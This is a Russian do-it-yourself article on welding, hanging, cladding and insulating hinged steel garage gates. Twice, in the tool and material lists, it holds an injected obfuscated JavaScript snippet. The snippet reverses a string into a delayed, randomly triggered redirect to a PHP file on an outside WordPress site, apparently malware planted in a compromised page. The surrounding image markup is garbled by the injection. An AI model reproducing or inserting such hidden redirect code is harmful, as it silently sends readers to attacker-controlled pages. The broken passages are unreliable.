Как сделать распашные гаражные ворота своими руками — уникальный способ, доступный каждому
Собрать и смонтировать гаражные ворота может каждый, никакой особенной подготовки для этого не требуется. Но у опытных мастеров есть свои секреты. Я расскажу вам, как сделать гаражные ворота своими руками и что следует знать, прежде чем приступать к работе.
Тип ворот нужно выбрать еще до строительства гаража.
Виды ворот для гаражей
Иллюстрация
Общие характеристики
Подъемно-поворотная конструкция.
Ворота представляют собой цельную, монолитную створку, которая поднимается под потолок и становится параллельно ему.
Самостоятельно сделать можно, но много точной подгонки, плюс нужен чертеж и качественные шарнирные узлы.
Подъемно-секционная конструкция.
Полотно ворот состоит из отдельных горизонтально ориентированных секций. При открывании секции преломляются, и конструкция отъезжает вверх, параллельно потолку.
Такие ворота для гаража своими руками сделать нереально. Вы можете либо заказать работу под ключ, либо купить готовую систему и установить ее самостоятельно.
Откатные ворота.
Створка здесь отъезжает в сторону, параллельно стене гаража. Конструкция аналогична дверям шкафа-купе. В частных гаражах практически не используется, больше подходит для ангаров или складов.
Самостоятельно сделать можно, но нет смысла, так как герметичность и прочность запоров в таких воротах крайне низкая.
Роллетные конструкции.
Створка состоит из алюминиевых ламелей, она собирается в специальный короб над входом.
Это обычные рольставни, только больших размеров. Делаются под заказ и устанавливаются только профессионалами.
Распашные ворота.
Самый надежный и недорогой вариант. Конструкция состоит из опорной рамы по периметру входа и двух створок ворот базирующихся на стандартных петлях.
Подобные распашные ворота в гараж своими руками сделать проще всего, что и подтверждается статистикой — 70 % современных гаражей оборудуется такими конструкциями.
Тонкости сборки и монтажа ворот
С видами конструкций разобрались, теперь поговорим о том, как сделать ворота в гараж своими руками. Какую бы конструкцию вы не выбрали, есть общие рекомендации абсолютно для всех гаражных ворот:
Ширина. Расстояние от рамы до машины должно быть не менее 30 см с каждой стороны, как правило, ширина рамы ворот делается в пределах 2,5–3 м. Сейчас встречаются гаражи на несколько машин с широким заездом, так вот максимум для них составляет 5 м;
Высота. Минимальная высота проема составляет 2 м, но если гараж находится еще на стадии строительства, то делайте хотя бы 2,20 м, а лучше 2,50 м. Запас не будет лишним, возможно завтра в этот гараж придется ставить высокий внедорожник или микроавтобус;
Пространство внутри. Желательно чтобы от боковой рамы ворот до смежной перпендикулярной ей стены было не менее 80 см.
Инструменты и материалы
Будем считать, что у нас есть новый гараж, который сложен из кирпича или шлакоблока и проем под ворота ничем не усилен и не оборудован.
Готовим инструменты:
Сварочный аппарат. Цена такого агрегата стартует от 5 000 руб.;
Компактный сварочный аппарат — незаменимая вещь в любом частном доме.
Болгарка. Помимо дисков для резки металла обязательно возьмите еще насадку с металлической корд-щеткой;
Перфоратор с набором буров;
$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tora-i-bolgarki-600×413.jpg» alt=»Сделать гаражные ворота без перфоратора и болгарки нереально.» width=»600″ height=»413″ /> Сделать гаражные ворота без перфоратора и болгарки нереально.
Молоток. Кроме него желательно еще иметь у себя кувалду;
Уровень столярный и уровень жидкостный;
Отвертка, плоскогубцы, керн, рулетка, отвес.
Готовим материалы:
Уголок. Для сборки рамы ворот я рекомендую использовать уголок 100 мм. Несущий tona-649″>каркас под створки мы будем делать из стального уголка 50 мм;
Стальная полоса. Перемычки на несущей раме можно делать из стальной полосы 50х6 мм или пятидесятого уголка;
Каркас ворот из профилированной трубы по своим характеристикам практически не уступает каркасу из уголка.
Вместо стального уголка можно использовать профильную трубу 60х40 мм.
Арматурный прут. Понадобится несколько метров толщиной 10–14 мм;
Стальной лист. Для обшивки каркаса берем холоднокатаный лист толщиной минимум 3 мм.
$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tolko-na-600×470.jpg» alt=»Профлист для обшивки ворот используется только на охраняемой территории.» width=»600″ height=»470″ /> Профлист для обшивки ворот используется только на охраняемой территории.
Гаражные навесы. Для стандартных ворот шириной 2,5 м достаточно 4 навесов (2х2), если проем широкий, то желательно делать усиленную подвеску из 6 навесов (3х2), навесы используем наружные.
Сборка несущей рамы под ворота
Несущая рама — это усиленный металлический каркас, устанавливаемый по периметру проема ворот и собираемый из мощных уголков. На этот каркас мы впоследствии будем навешивать створки ворот.
Хотя мы говорим о том, как сделать ворота на гараж своими руками, в одиночку это сделать очень тяжело, поэтому постарайтесь найти человека который будет просто поддерживать детали, пока вы будете их резать и варить.
Иллюстрация
Инструкция
Боковая часть рамы. За основу берем стальной уголок 100 мм.
Первыми монтируем 2 боковые вертикальные секции, для этого отмеряем по высоте проема 4 уголка и отрезаем их.
Ставим уголок.
Ширина фасадной стены в гаражах может доходить до полуметра.
Один уголок мы приставляем к стене с наружной стороны, второй — с внутренней;
Уголки выставляем четко по отвесу, даже если кладка не совсем ровная.
Привариваем поперечины.
Сварная рама должна быть цельной, поэтому между уголками мы привариваем полосу 50х6 мм. Полоса монтируется горизонтально с шагом около метра.
Если полосы нет, то вместо нее можно использовать уголок 50х50 мм, но тогда горизонтальное крыло уголка нужно будет утопить в стене, для этого между рядами кирпича или шлакоблока придется выбрать болгаркой паз глубиной 50 мм.
Забиваем фиксаторы.
Хотя каркас у нас получается П-образный и плотно надевается на стену, его дополнительно нужно закрепить.
Такие крепления не позволят раме деформироваться, соответственно ворота не поведет и не заклинит;
Фиксировать раму мы будем при помощи мощных штырей из арматуры. Для этого с обеих сторон приваренных ранее полос, по нижней кромке мы высверливаем перфоратором отверстия глубиной порядка 200 мм. Диаметр отверстий подбираем по толщине арматуры;
Фиксируем раму.
Заполняем отверстия цементно-песчаным раствором и плотно (кувалдой) забиваем в них штыри арматуры;
Когда штырь забит, отмеряем от каркаса 50 мм и обрезаем лишнее, после чего кувалдой загибаем штыри вверх и намертво привариваем их к каркасу;
Можно обрезать штырь вровень с каркасом и обварить с двух сторон, но крюки будут надежней.
Отбиваем горизонталь.
Когда боковые стойки рамы сварены и закреплены, можно переходить к верхнему и нижнему секторам.
Уголок здесь выставляется четко по горизонту, для разметки удобней пользоваться гидроуровнем, столярный не даст такой точности.
Сварка каркаса.
Верхний и нижний сектора собираются и фиксируются так же, как и боковые.
Только вначале вам нужно по меткам с обеих сторон приварить несущие уголки, а уже после этого приваривать поперечины из полосы и фиксировать каркас на основе.
Крюки из арматуры внизу лучше не делать, это будет некрасиво и они, могут мешать.
Финишная отделка.
Если проем изначально был не совсем ровным, то между стеной и каркасом у вас останутся зазоры, эти зазоры вы потом заполните цементно-песчаным раствором.
А вообще лучше полностью заштукатурить все вровень с уголками.
Как сварить створки для ворот
Я предлагаю принципиально другой подход: мы создаем общую раму, а потом разрезаем ее на отдельные створки.
Иллюстрация
Описание процесса
Навариваем косынки.
Создание каркаса для створок начинаем с установки 4 косынок по углам:
Отрезаем 4 уголка примерно по 50 см каждый и привариваем их на фасаде так, чтобы уголок с рамой образовывал прямоугольный треугольник;
Косынки не нужно приваривать намертво это временная конструкция, которая потом будет срезаться болгаркой. Здесь достаточно прихватить уголки в нескольких точках, лишь бы не отвалились;
Привариваем периметр рамы.
По бокам и сверху зазор между рамой створок ворот и гаражной рамой составляет порядка 10 мм, снизу зазор должен быть в 2 раза больше, то есть 20 мм.
Вот по этим габаритам и отрезаете 4 уголка 50х50 мм, 2 цельных уголка на всю ширину ворот и 2 цельных уголка по высоте;
Теперь к нашим косынкам привариваем 4 цельных отрезанных уголка, опять же намертво приваривать не нужно, только «прихватить». А вот по углам рама сваривается капитально.
Перед тем как сварить в единую раму верхний и нижний уголок, то крыло, которое расположено горизонтально, полностью разрезается строго по центру, уголок будет держаться только на вертикальном, обращенном к фасаду крыле.
Привариваем закладки.
Благодаря наваренным нами косынкам рама для створок будет стоять четко вровень с рамой гаража;
Чтобы зазор между рамой гаража и рамой створок по периметру был везде одинаковым и уголки не «играли» нам нужно будет еще приварить изнутри несколько временных закладных;
Берете небольшие кусочки арматуры и контролируя зазор привариваете их изнутри между рамой гаража и уголком под раму створок.
Ребра жесткости.
Теперь можно приступать к монтажу ребер жесткости:
Первыми устанавливаются вертикальные уголки по центру, их капитально привариваем по обеим сторонам от тех разрезов, которые мы делали в верхнем и нижнем уголках;
В одной из створок мы делаем дверь. Для этого привариваем несколько вертикальных и горизонтальных уголков, ориентировочная конструкция такого каркаса показана на схеме;
Монтаж навесов.
Возьмем самые простые гаражные навесы, которые вытачиваются и собираются по принципу «папа-мама».
«Папу» (часть навеса со штырем) нужно приварить к раме гаража, а «маму» (часть навеса в виде стакана) привариваем к створке ворот.
Разрезаем створки.
В принципе, каркас конструкции собран. Теперь мы дорезаем до конца те надрезы верхнего и нижнего уголка в каркасе под створки ворот;
Срезаем косынки и закладки.
Но створки еще не откроются, им будут мешать косынки по углам и приваренные изнутри закладные по периметру.
Берете болгарку и все эти вспомогательные крепления аккуратно срезаете;
Когда закладные и косынки срежутся, створки ворот свободно откроются, нам нужно будет их снять с петель и обшить стальным холоднокатаным листом.
Каркас дверей встроенный в одну из секций ворот сваривается по точно такой же технологии, то есть привариваем косынки, свариваем внутренний периметр дверного каркаса и привариваем навесы. После чего косынки срезаются и двери открываются.
Обшиваем и утепляем ворота
Иллюстрация
Описание процесса
Отмеряем и отрезаем листы.
Стальной лист для обшивки створок ворот по бокам и сверху делается на 20 мм шире каркаса, а снизу на 30 мм шире каркаса.
Лист должен полностью закрывать зазор между каркасом ворот и каркасом створок, плюс еще на 10 мм заходить на каркас ворот.
Обеспечиваем нахлест.
Центральное соединение между створками делается с нахлестом.
На одной из створок лист делается шире, он перекрывает зазор между створками и заходит на каркас смежной створки на 10 мм, а на второй створке лист делается уже на 10 мм.
В результате листы у вас будут «встречаться» на уголке и зазора не будет видно.
Привариваем лист.
Под крепление навесов нужно будет сделать небольшие вырезы, размеры этих вырезов определяются по месту и края листа обязательно обвариваются по кромке выреза.
Если со сварочным аппаратом вы «общаетесь» на любительском уровне, то изнутри ребра жесткости и каркас не стоит приваривать к листу сплошным швом, можно случайно прожечь лист. Здесь лист лучше приваривать точечно с шагом 50–70 мм.
Зачищаем ворота от коррозии.
Отделка гаражных ворот начинается с зачистки металла корд-щеткой.
Окрашивание ворот.
Металл нужно обезжирить ацетоном и приступать к покраске. Краска наносится минимум в 2 слоя.
Утепление пенопластом.
Проще всего ворота в гараж своими руками утеплить пенопластом ПСБ-С25 толщиной 50 мм.
Его нужно выкроить по размерам и приклеить между ребрами жесткости на монтажную пену или какой-нибудь специальный клей.
Эффект термоса.
Сверху на пенопласт можно приклеить полотно фольгированного изолона (вспененный полиэтилен, покрытый фольгой), в результате вы получите эффект термоса.
Облицовка вагонкой.
Часто гаражи обшивают вагонкой, в этом случае, перед тем как выкраивать пенопластовые вставки, нужно будет прикрутить к ребрам жесткости деревянный брус 50х50 мм.
Потом оставшееся свободное место заклеивается пенопластом и сверху на брус набивается вагонка.
Запоры для ворот.
Выбор замков и разных хитроумных секретов дело личное. Единственное, что я могу вам посоветовать, это установить по углам каждой створки засовы, по 2 сверху и снизу.
Металлические штыри этих засовов должны входить в уголок гаражной рамы. Это будет своеобразной страховкой, на случай если злоумышленники срежут наружные петли.
Навесной замок лучше вообще не использовать, толку от него не много, но за проушины для такого замка можно подцепить стальной трос и вырвать гаражные ворота при помощи хорошего грузовика.
Вывод
Представленный способ сооружения гаражных ворот неоднократно проверен мною на практике. На фото и видео в этой статье собран дополнительный материал по теме гаражных ворот. Если возникли вопросы, задавайте их в комментариях, постараюсь помочь.
Гаражные распашные ворота — наиболее надежный и проверенный временем вариант.
Понравилась статья? Подписывайтесь на наш канал Яндекс.Дзен
Оставить комментарий
ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней
Оставить комментарий
Оставляя комментарий, Вы принимаете пользовательское соглашение